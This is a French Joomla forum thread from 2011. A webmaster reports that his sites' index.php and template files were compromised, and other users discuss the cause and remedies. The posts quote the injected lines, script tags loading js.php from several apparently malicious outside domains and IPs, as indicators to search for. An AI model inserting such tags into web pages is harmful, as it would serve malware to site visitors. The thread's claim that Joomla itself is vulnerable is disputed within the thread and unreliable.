Alerte de sûreté Joomla!1.5 & 1.6 (Hackers)

Réduire
X
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [RÉGLÉ] Alerte de sûreté Joomla!1.5 & 1.6 (Hackers)



    Salut,

    Je lance une alerte de sûreté, merci de déplacer ce post au bon endroit par un modérateur.
    De nombreux sites Joomla! 1.5 & 1.6 sont attaqués en ce moment dont les miens ainsi que ceux de mes amis sur d'autres domaines et hébergeurs.

    Un petit malin a réussi à ajouter un script dans les pages INDEX.PHP et également dans les pages INDEX.PHP des templates ! Je n'ai pas encore eu le temps de regarder dans les autres fichiers si ils sont infectés.

    NOTE: Avec l'extension pour Mozzila Firefox "FireBug" on peu assez vite vérifier si quelque chose a été ajouté.

    Se script se présent souvent sous cette forme :

    Code PHP:
    <script type="text/javascript" src="http://195.117.140.90/js.</script> 
    Mais il y en beaucoup de variantes ! (Parfois ils sont plus complexes)

    Dans tous les cas, ils sont situé avant le code de sécurité de Joomla

    Code PHP:
    // Le script des hackers sont ici ...
    <?php

    // Code de sécurité
    defined'_JEXEC' ) or die( 'Restricted access' );
    Ils placent leur code AVANT l'indication d'ouverture du language PHP :

    Code PHP:
    <?php
    De fait, ils exécutent souvent en distant le script sur votre page qu'il veulent.

    En cherchant d'ou viens l'attaque, je me suis choppé un malware qui m'a installé le faux VISTA AntiVirus 2011 qui m'empêche d'aller sur le net.

    Je suis en trains de régler ce problème en priorité, je vous écris de mon 2eme ordinateur, le premier est carrément hors d'usage mais je le soigne.

    Si vous avez ce problème également avec ce faux Firewall Vista voici la méthode pour le virer : http://www.2-spyware.com/remove-vist...irus-2011.html

    Surveillez vos fichier PHP, regardez d'urgence si un script n'a pas été ajouté devant votre balise tout en haut de votre page !
    Appel aux développeurs, avez-vous une parade contre ça ? Faut t'il les placer en "lecture seul" au risque de compromettre le bon fonctionnement du site ?

    Merci de me tenir informé.
    Dernière édition par felichon à 17/04/2011, 20h40

  • #2
    Re : Alerte de sûreté Joomla!1.5 &amp; 1.6 (Hackers)

    tu peux toujours mettre les fichiers en 644 ... en lecture seule pour tout le monde sauf le propriétaire
    Agence web Joomla www.nartconcept.fr spécialisée en création de sites Joomla professionnels http://www.nartconcept.fr/services.html
    RT3 Framework : www.rt3.fr pour Joomla 1.7.x & 2.5

    Commentaire


    • #3
      Re : Alerte de sûreté Joomla!1.5 &amp; 1.6 (Hackers)

      Salut nart,

      C'est ce que je vais faire, vous devriez aussi alors !
      Je viens de "soigner" mon 1ere site il fonctionne à nouveau, après recherche ils placent leurs script uniquement dans ceux auquels ils ont accès, c'est à dire les index.php principaux et ceux des templates, attention ils les placent dans tout les index.php des templates, même ceux du système !

      Si la galère vous arrive, vous saurez ou les chercher !

      Bon, je file il me reste 15 de mes sites à "traiter" + un ordinateur à réparer.

      Pfiou ...

      Commentaire


      • #4
        Re : Alerte de sûreté Joomla!1.5 &amp; 1.6 (Hackers)

        En cherchant d'ou viens l'attaque, je me suis choppé un malware qui m'a installé le faux VISTA AntiVirus 2011 qui m'empêche d'aller sur le net.
        C'est donc ton PC qui a infecté tes sites ?
        Sais tu comment à agit la vérole (via ftp, en récupérant tes login ?) ?
        Cette alerte pourrait être assez chaude !
        N'oubliez pas de passer vos post en "réglé" c'est très utile à celui qui cherche, ...et qui se perd http://forum.joomla.fr/announcement.php?f=133 mais trouvera grâce à vous
        profil : http://quelprestataire.fr/robert-suzanne+texier"

        Commentaire


        • #5
          Re : Alerte de sûreté Joomla!1.5 &amp; 1.6 (Hackers)

          Envoyé par felichon Voir le message
          Salut nart,



          Je viens de "soigner" mon 1ere site il fonctionne à nouveau, après recherche ils placent leurs script uniquement dans ceux auquels ils ont accès, c'est à dire les index.php principaux et ceux des templates, attention ils les placent dans tout les index.php des templates, même ceux du système !

          Si la galère vous arrive, vous saurez ou les chercher !

          Bon, je file il me reste 15 site à "traiter" + un ordinateur à réparer.

          Pfiou ...
          Salut Felichon,

          hm, tu en es sûr que ça soit Joomla en cause ? ça ne viendrait pas d'une extension ?

          pour info, voici mes stat's de sécurité :

          Inclusion de fichiers distants : 64 [ 41.0 % | 000.3 /h ]

          hm, donc, soit ça vient d'une extension, soit faut revoir tes paramètres de sécurité
          Agence web Joomla www.nartconcept.fr spécialisée en création de sites Joomla professionnels http://www.nartconcept.fr/services.html
          RT3 Framework : www.rt3.fr pour Joomla 1.7.x & 2.5

          Commentaire


          • #6
            Re : Alerte de sûreté Joomla!1.5 &amp; 1.6 (Hackers)

            Salut abmag,

            Non, ce n'est pas mon PC, rien à voir.

            J'ai essayé de dé-compiler un script plux complexe d'un de ses hackers, par mégarde sa m'a renvoyé directement sur leur page qui m'a balancé le malware car j'ai cliqué par erreur sur "valider" car j'avais plus de 8 fenêtre ouvertes et une erreur de manipulation est si vite arrivé.

            Je trouve ça grave comme faiblesse dans Joomla! car bien que le code est protégé, ils balance leur scripte avant celui de joomla et comme PHP est interprété par le serveur et non par le navigateur le script s'exécute avant les requêtes Joomla.

            Pfiou, passer les fichiers en 664 va poser un problème dans la personnalisations des tempates "pro" comme les miens car comme ils passent en lecture seul les modifications ne sont plus opéré.

            Bref, j'y retourne, j'ai des scripts à virer, celui que je viens de virer à l'instant viens du template systeme de joomla, le voici se salopard :

            Code PHP:
            <script type="text/javascript" src="http://r-komfortstyle.ru/js.php"></script
            On vois clairement le lien à qui il bénéficie, je vous déconseille d'y aller, pas qu'il vous injecte une saloperie dans votre machine !!!

            @ +++

            Commentaire


            • #7
              Re : Alerte de sûreté Joomla!1.5 &amp; 1.6 (Hackers)

              Inclusion de fichiers distants : 64 [ 41.0 % | 000.3 /h ]
              Je reste baba
              cela se lit comment ça ?
              N'oubliez pas de passer vos post en "réglé" c'est très utile à celui qui cherche, ...et qui se perd http://forum.joomla.fr/announcement.php?f=133 mais trouvera grâce à vous
              profil : http://quelprestataire.fr/robert-suzanne+texier"

              Commentaire


              • #8
                Re : Alerte de sûreté Joomla!1.5 &amp; 1.6 (Hackers)

                @ Nart :

                Non ! Mes domaines :

                http://eliopro.com (3 sites présents, les 3 infectés AUCUN n'a les même extensions)
                http://eliopro.fr est aussi infecté alors qu'ils n'a carrément aucune des extensions du domaine précédent.

                De plus, des amis sous me confirment avoir eu la même chose alors qu'il n'ont pas les mêmes hébergeurs ni domaine que moi !!!

                Important, on à tous subit cette attaque depuis vendredis derniers, personnellement moi c'est cette nuit.

                J'ai déjà trouvé d'ou ça viens, c'est déjà pas mal et comment y remédier mais pas comment s'en prémunir malheureusement.
                Dernière édition par felichon à 11/04/2011, 14h09

                Commentaire


                • #9
                  Re : Alerte de sûreté Joomla!1.5 &amp; 1.6 (Hackers)

                  Envoyé par nart Voir le message
                  Salut Felichon,

                  hm, tu en es sûr que ça soit Joomla en cause ? ça ne viendrait pas d'une extension ?

                  pour info, voici mes stat's de sécurité :

                  Inclusion de fichiers distants : 64 [ 41.0 % | 000.3 /h ]

                  hm, donc, soit ça vient d'une extension, soit faut revoir tes paramètres de sécurité
                  Heu ... ça veut dire que ton hébergeur n'est sûr qu'à 59% ou qu'à 41%

                  Dans les deux cas c'est GRAVE !

                  Commentaire


                  • #10
                    Re : Alerte de sûreté Joomla!1.5 &amp; 1.6 (Hackers)

                    Envoyé par abmag Voir le message
                    Je reste baba
                    cela se lit comment ça ?
                    cela se lit comme ça ))) 64 tentatives = 41 % sur la totalité de 156 attaques
                    Agence web Joomla www.nartconcept.fr spécialisée en création de sites Joomla professionnels http://www.nartconcept.fr/services.html
                    RT3 Framework : www.rt3.fr pour Joomla 1.7.x & 2.5

                    Commentaire


                    • #11
                      Re : Alerte de sûreté Joomla!1.5 &amp; 1.6 (Hackers)

                      Envoyé par felichon Voir le message
                      Heu ... ça veut dire que ton hébergeur n'est sûr qu'à 59% ou qu'à 41%

                      Dans les deux cas c'est GRAVE !
                      non, ce sont des tentatives, qui ont été bloquées ... pour ce qui est de pourcentage, explication plus bas
                      Agence web Joomla www.nartconcept.fr spécialisée en création de sites Joomla professionnels http://www.nartconcept.fr/services.html
                      RT3 Framework : www.rt3.fr pour Joomla 1.7.x & 2.5

                      Commentaire


                      • #12
                        Re : Alerte de sûreté Joomla!1.5 &amp; 1.6 (Hackers)

                        Bonjour

                        Déplacement du topic dans sécurité.

                        @+
                        SVP pas de MP pour de l'aide, le forum est l’outil idéal

                        Commentaire


                        • #13
                          Re : Alerte de sûreté Joomla!1.5 &amp; 1.6 (Hackers)

                          Salut,

                          Bon, je me croyais tiré d'affaire mais que nenni haha

                          En fronted tout est OK, mais ses petits malins s'attaquent aussi dans l'admin (du moins l'index par défaut index.php, pas dans index.php2 & 3)

                          Ils s'attaquent aussi au templates de l'administration, il faut donc également traiter le fichier index.php du template admin.

                          Voici ce que j'ai déjà supprimé, chaque ligne reprisent une page différent :

                          Code PHP:
                          <script type="text/javascript" src="http://r-komfortstyle.ru/js.php"></script>
                          <
                          script type="text/javascript" src="http://ideascampechanas.com/js.php"></script>
                          <
                          script type="text/javascript" src="http://trackit.pl/js.php"></script>
                          <
                          script type="text/javascript" src="http://www.apk.infoseka.lt/js.php"></script>
                          <
                          script type="text/javascript" src="http://canas-bg.com/js.php"></script>
                          <
                          script type="text/javascript" src="http://sagitta.cp5.win.pl/js.php"></script>
                          <
                          script type="text/javascript" src="http://saglikalemi.com/js.php"></script>
                          <
                          script type="text/javascript" src="http://213.175.200.227/js.php"></script
                          Mais punaise, comment ont-ils réussi à ajouter ce script dans touts ses domaines différents ???

                          PS : je suis chez NUXIT
                          Dernière édition par felichon à 11/04/2011, 14h35

                          Commentaire


                          • #14
                            Re : Alerte de sûreté Joomla!1.5 &amp; 1.6 (Hackers)

                            Merci LeMalouin,

                            Je ne savais pas ou le poster.

                            Dis, tu peu prévenir la communauté Anglophone sur le problème ? Mon anglais est relativement limité pour le faire.

                            Merci.

                            Commentaire


                            • #15
                              Re : Alerte de sûreté Joomla!1.5 &amp; 1.6 (Hackers)

                              Bonjour,
                              attention à ta façon de communiquer, au conclusions définitives que tu tires, et aux infos que tu propages. Pour l'instant tu n'a pas démontré que la faille est liée à Joomla (1.5 ET 1.6 en même temps qui plus est). Sur des millions de sites Joomla, si les trois tiens tombent en même temps, leur point commun le plus évident, avant Joomla, c'est ton poste de travail.
                              Surtout quand tu dis par ailleurs que ton poste se choppe un malware dans la bagare, ce qui tend à prouver qu'il est moyennement protégé.

                              Donc oui on sait que J!1.5 et 1.6 sont susceptibles de contenir des failles, mais ton post ne le démontre pas et ton alerte non circonstanciée ne nous permet pas d'améliorer la prévention. Donc pas la peine de crier si fort, et pense bien à déverminer complétement ton poste avant de continuer à jouer, sous peine de voir tout revenir encore plus vite.
                              Schtroumpfe toi le Schtroumpf t'aidera.
                              Je ne schtroumpfe pas aux demandes de schtroumpf par MP.

                              Commentaire

                              Annonce

                              Réduire
                              1 sur 2 < >

                              C'est [Réglé] et on n'en parle plus ?

                              A quoi ça sert ?
                              La mention [Réglé] permet aux visiteurs d'identifier rapidement les messages qui ont trouvé une solution.

                              Merci donc d'utiliser cette fonctionnalité afin de faciliter la navigation et la recherche d'informations de tous sur le forum.

                              Si vous deviez oublier de porter cette mention, nous nous permettrons de le faire à votre place... mais seulement une fois
                              Comment ajouter la mention [Réglé] à votre discussion ?
                              1 - Aller sur votre discussion et éditer votre premier message :


                              2 - Cliquer sur la liste déroulante Préfixe.

                              3 - Choisir le préfixe [Réglé].


                              4 - Et voilà… votre discussion est désormais identifiée comme réglée.

                              2 sur 2 < >

                              Assistance au forum - Outil de publication d'infos de votre site

                              Compatibilité: PHP 4.1,PHP4, 5, 6DEV MySQL 3.2 - 5.5 MySQLi from 4.1 ( @ >=PHP 4.4.9)

                              Support Version de Joomla! : | J!3.0 | J!2.5.xx | J!1.7.xx | J!1.6.xx | J1.5.xx | J!1.0.xx |

                              Version française (FR) D'autres versions sont disponibles depuis la version originale de FPA

                              UTILISER À VOS PROPRES RISQUES :
                              L'exactitude et l'exhaustivité de ce script ainsi que la documentation ne sont pas garanties et aucune responsabilité ne sera acceptée pour tout dommage, questions ou confusion provoquée par l'utilisation de ce script.

                              Problèmes connus :
                              FPA n'est actuellement pas compatible avec des sites Joomla qui ont eu leur fichier configuration.php déplacé en dehors du répertoire public_html.

                              Installation :

                              1. Téléchargez l'archive souhaitée : http://afuj.github.io/FPA/

                              Archive zip : https://github.com/AFUJ/FPA/zipball/master

                              2. Décompressez le fichier de package téléchargé sur votre propre ordinateur (à l'aide de WinZip ou d'un outil de décompression natif).

                              3. Lisez le fichier LISEZMOI inclus pour toutes les notes de versions spécifiques.

                              4. LIRE le fichier de documentation inclus pour obtenir des instructions d'utilisation détaillées.

                              5. Téléchargez le script fpa-fr.php à la racine de votre site Joomla!. C'est l'endroit que vous avez installé Joomla et ce n'est pas la racine principale de votre serveur. Voir les exemples ci-dessous.

                              6. Exécutez le script via votre navigateur en tapant: http:// www. votresite .com/ fpa-fr.php
                              et remplacer www. votresite .com par votre nom de domaine


                              Exemples:
                              Joomla! est installé dans votre répertoire web et vous avez installé la version française du fichier FPA:
                              Télécharger le script fpa-fr.php dans: /public_html/
                              Pour executer le script: http://www..com/fpa-fr.php

                              Joomla! est installé dans un sous-répertoire nommé "cms" et vous avez installé la version française du fichier FPA:
                              Télécharger le script fpa-fr.php dans: /public_html/cms/
                              Pour executer le script: http://www..com/cms/fpa-fr.php

                              En raison de la nature très sensible de l'information affichée par le script FPA, il doit être retiré immédiatement du serveur après son utilisation.

                              Pour supprimer le script de votre site, utilisez le lien de script de suppression fourni en haut de la page du script. Si le lien de suppression échoue pour supprimer le script, utilisez votre programme FTP pour le supprimer manuellement ou changer le nom une fois que le script a généré les données du site et le message publié sur le forum. Si le script est toujours présent sur le site, il peut être utilisé pour recueillir suffisamment d'informations pour pirater votre site. Le retrait du script empêche des étrangers de l'utiliser pour jeter un oeil à la façon dont votre site est structuré et de détecter les défauts qui peuvent être utilisé à vos dépends.
                              Voir plus
                              Voir moins
                              Travaille ...
                              X